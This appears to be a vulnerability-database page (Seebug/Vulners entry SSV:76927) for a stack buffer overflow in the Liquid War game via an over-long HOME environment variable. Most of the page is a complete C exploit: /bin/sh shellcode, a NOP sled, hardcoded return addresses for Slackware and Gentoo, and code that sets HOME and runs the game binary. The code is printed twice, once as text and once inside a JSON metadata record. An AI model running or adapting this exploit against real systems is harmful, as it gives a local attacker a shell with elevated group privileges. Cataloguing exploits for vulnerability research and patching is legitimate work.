Search...

Liquid War 5.4.5/5.5.6 HOME Environment Variable Buffer Overflow Vulnerability

2014-07-01T00:00:00

ID SSV:76927
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/8629/info

Liquid War has been reported prone to a buffer overflow condition when handling HOME environment variables of excessive length.

The issue presents itself, due to a lack of sufficient boundary checks performed on data contained in the HOME environment variable before it is copied into a reserved buffer in stack based memory. It has been reported that a local attacker may exploit this condition to execute arbitrary instructions with GID Games privileges. 

/*
*
*                             http://www.rosiello.org
*                              (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Slakware 9.0.0 & Gentoo 1.4
*
* Author: Angelo Rosiello
* Mail  : angelo@rosiello.org
* URL   : http://ww.rosiello.org
*
* Greetz: Astharot by Zone-H who posted the stack overflow bug
*
*/

#include &#60;stdio.h&#62;
#include &#60;unistd.h&#62;
#include &#60;stdlib.h&#62;

/* /bin/sh */
static char shellcode[]=
&#34;\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d&#34;
&#34;\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58&#34;;

#define NOP     0x90
#define LEN     520           //Buffer for Slackware 9.0.0
//#define LEN   528           //Buffer for Gentoo 1.4
#define RET     0xbffff414    //Valid Address for Slackware 9.0.0
//#define RET   0xbffff360    //Valid Address for Gentoo 1.4

int main()
{
        char buffer[LEN];
        long retaddr = RET;
        int i;


        fprintf(stderr, &#34;\n(c) Rosiello Security 2003 - http://www.rosiello.org\n&#34;);
        fprintf(stderr, &#34;Liquidwar&#39;s exploit for Slackware 9.0.0\n&#34;);
        fprintf(stderr, &#34;by Angelo Rosiello - angelo@rosiello.org\n\n&#34;);
        fprintf(stderr, &#34;using address 0x%lx\n&#34;,retaddr);

        for (i=0;i&#60;LEN;i+=4) *(long *)&buffer[i] = retaddr;

        for (i=0;i&#60;(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;

        memcpy(buffer+i,shellcode,strlen(shellcode));

        /* export the variable, run liquidwar */

        setenv(&#34;HOME&#34;, buffer, 1);
        execl(&#34;/usr/games/liquidwar&#34;,&#34;liquidwar&#34;,NULL);

        return 0;
}

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:26:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T15:26:29", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:26:29", "rev": 2}, "vulnersScore": 0.6}, "href": "https://www.seebug.org/vuldb/ssvid-76927", "references": [], "enchantments_done": [], "id": "SSV:76927", "title": "Liquid War 5.4.5/5.5.6 HOME Environment Variable Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n source: http://www.securityfocus.com/bid/8629/info\r\n\r\nLiquid War has been reported prone to a buffer overflow condition when handling HOME environment variables of excessive length.\r\n\r\nThe issue presents itself, due to a lack of sufficient boundary checks performed on data contained in the HOME environment variable before it is copied into a reserved buffer in stack based memory. It has been reported that a local attacker may exploit this condition to execute arbitrary instructions with GID Games privileges. \r\n\r\n/*\r\n*\r\n* http://www.rosiello.org\r\n* (c) Rosiello Security\r\n*\r\n* Copyright Rosiello Security 2003\r\n* All Rights reserved.\r\n*\r\n* Tested on Slakware 9.0.0 & Gentoo 1.4\r\n*\r\n* Author: Angelo Rosiello\r\n* Mail : angelo@rosiello.org\r\n* URL : http://ww.rosiello.org\r\n*\r\n* Greetz: Astharot by Zone-H who posted the stack overflow bug\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n\r\n/* /bin/sh */\r\nstatic char shellcode[]=\r\n"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d"\r\n"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58";\r\n\r\n#define NOP 0x90\r\n#define LEN 520 //Buffer for Slackware 9.0.0\r\n//#define LEN 528 //Buffer for Gentoo 1.4\r\n#define RET 0xbffff414 //Valid Address for Slackware 9.0.0\r\n//#define RET 0xbffff360 //Valid Address for Gentoo 1.4\r\n\r\nint main()\r\n{\r\n char buffer[LEN];\r\n long retaddr = RET;\r\n int i;\r\n\r\n\r\n fprintf(stderr, "\\n(c) Rosiello Security 2003 - http://www.rosiello.org\\n");\r\n fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\\n");\r\n fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\\n\\n");\r\n fprintf(stderr, "using address 0x%lx\\n",retaddr);\r\n\r\n for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;\r\n\r\n for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;\r\n\r\n memcpy(buffer+i,shellcode,strlen(shellcode));\r\n\r\n /* export the variable, run liquidwar */\r\n\r\n setenv("HOME", buffer, 1);\r\n execl("/usr/games/liquidwar","liquidwar",NULL);\r\n\r\n return 0;\r\n}\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-76927", "type": "seebug"}